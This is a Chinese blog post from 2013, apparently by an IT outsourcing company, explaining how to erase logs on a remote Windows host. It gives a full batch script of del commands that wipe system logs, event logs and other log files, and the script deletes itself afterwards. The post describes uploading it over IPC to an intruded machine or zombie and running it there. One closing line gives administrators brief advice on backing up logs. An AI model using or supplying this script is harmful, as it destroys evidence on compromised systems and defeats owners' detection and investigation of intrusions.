怎么清除远程主机上的日志？

2013-09-16 10:16 作者：ly 浏览量：

　　今天艾锑无限给大家介绍的清除远程主机上的日志的方法是：自己编写批处理文件来实现。

　　编写一个能清除日志的批处理非常简单，新建一个文本文档，在其中输入以下内容： 

   @del c:\windows\system32\logfiles\*.* 

   @del c:\windows\system32\config\*.evt 

   @del c:\windows\system32\dtclog\*.* 

   @del c:\windows\system32\*.log 

   @del c:\windows\system32\*.txt 

   @del c:\windows\*.txt 

   @del c:\windows\*.log 

   @del c:\del log.bat （实际使用时，视具体位置而定）

   把上面的内容保存为log.bat备用。在上面的代码中“@”前缀字符表示执行时本行在命令行或DOS里面不显示。之后黑客通过IPC连接将log.bat文件上传到被入侵主机或肉鸡上，将log.bat文件执行以下就可以了。

　　除此之外，还可以利用第三方软件等方法来实现清理目的，大体原理都一样。作为管理员应定期备份日志文件，防止被入侵后清空日志。另外可以把日志文件的路径更改，预防黑客用批处理文件清理日志。

艾锑无限是国内领先IT外包服务商，专业为企业提供IT运维外包、电脑维护、网络维护、办公设备维护、服务器维护、数据备份恢复，门禁监控等多项IT外包服务。做为一家企业IT服务提供商，我们有责任也有义务为企业提供IT外包的相关信息，为企业的发展提升更高的效率，创造更大价值。欢迎您来电咨询：400-650-7820. 更多的IT外包信息尽在艾锑无限 http://www.itbmw.com